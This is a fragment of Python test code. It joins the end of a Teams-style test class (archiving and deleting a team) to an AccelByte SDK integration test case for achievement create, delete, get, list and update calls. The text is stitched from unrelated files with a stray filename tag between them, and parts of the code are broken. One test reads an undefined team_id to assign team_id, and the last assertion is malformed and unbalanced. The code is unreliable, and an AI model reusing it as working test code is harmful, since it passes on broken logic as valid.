team_to_update.fun_settings.allowGiphy = False team_to_update.update().execute_query() def test7_archive_team(self): team_id = self.client.teams[team_id].archive().execute_query() def test8_delete_team(self): grp_to_delete = self.__class__.target_team grp_to_delete.delete_object().execute_query()
<filename>tests/sample_apps/how_to/ from ._integration_test_case import IntegrationTestCase from accelbyte_py_sdk.api.achievement.models import ModelsAchievementRequest class AchievementTestCase(IntegrationTestCase): exist: bool = False models_achievement_request: ModelsAchievementRequest = ModelsAchievementRequest.create( achievement_code="CODE", default_language="EN", description={"EN": "DESCRIPTION"}, goal_value=1, hidden=False, incremental=False, locked_icons=[], name={"EN": "NAME"}, stat_code="STAT_CODE", tags=["TAG"], unlocked_icons=[] ) def tearDown(self) -> None: from accelbyte_py_sdk.api.achievement import admin_delete_achievement if self.exist: _, error = admin_delete_achievement(achievement_code=self.models_achievement_request.achievement_code) self.log_warning(msg=f"Failed to tear down achievement. {str(error)}", condition=error is not None) self.exist = error is not None super().tearDown() def test_admin_create_new_achievement(self): from accelbyte_py_sdk.api.achievement import admin_create_new_achievement from accelbyte_py_sdk.api.achievement import admin_delete_achievement # arrange _, error = admin_delete_achievement(achievement_code=self.models_achievement_request.achievement_code) self.exist = error is not None # act result, error = admin_create_new_achievement(body=self.models_achievement_request) self.exist = error is None # assert self.assertIsNone(error, error) def test_admin_delete_achievement(self): from accelbyte_py_sdk.api.achievement import admin_create_new_achievement from accelbyte_py_sdk.api.achievement import admin_delete_achievement # arrange _, error = admin_create_new_achievement(body=self.models_achievement_request) self.log_warning(msg=f"Failed to set up achievement. {str(error)}", condition=error is not None) self.exist = error is None # act result, error = admin_delete_achievement(achievement_code=self.models_achievement_request.achievement_code) self.exist = error is not None # assert self.assertIsNone(error, error) def test_admin_get_achievement(self): from accelbyte_py_sdk.api.achievement import admin_create_new_achievement from accelbyte_py_sdk.api.achievement import admin_get_achievement # arrange _, error = admin_create_new_achievement(body=self.models_achievement_request) self.log_warning(msg=f"Failed to set up achievement. {str(error)}", condition=error is not None) self.exist = error is None # act _, error = admin_get_achievement(achievement_code=self.models_achievement_request.achievement_code) # assert self.assertIsNone(error, error) def test_admin_list_achievements(self): from accelbyte_py_sdk.api.achievement import admin_create_new_achievement from accelbyte_py_sdk.api.achievement import admin_list_achievements # arrange _, error = admin_create_new_achievement(body=self.models_achievement_request) self.log_warning(msg=f"Failed to set up achievement. {str(error)}", condition=error is not None) self.exist = error is None # act _, error = admin_list_achievements() # assert self.assertIsNone(error, error) def test_admin_update_achievement(self): from accelbyte_py_sdk.api.achievement import admin_create_new_achievement from accelbyte_py_sdk.api.achievement import admin_update_achievement from accelbyte_py_sdk.api.achievement.models import ModelsAchievementUpdateRequest # arrange _, error = admin_create_new_achievement(body=self.models_achievement_request) self.log_warning(msg=f"Failed to set up achievement. {str(error)}", condition=error is not None) self.exist = error is None # act result, error = admin_update_achievement( achievement_code=self.models_achievement_request.achievement_code, body=ModelsAchievementUpdateRequest.create( default_language="ID", description={"ID": "KETERANGAN"}, goal_value=1, hidden=False, incremental=False, locked_icons=[], name={"ID": "NAMA"}, stat_code="KODE_STATUS", tags=["MENANDAI"], unlocked_icons=[] ) ) # assert self.assertIsNone(error, error) self.assertIn("ID", self.assertEqual("NAMA",["ID"])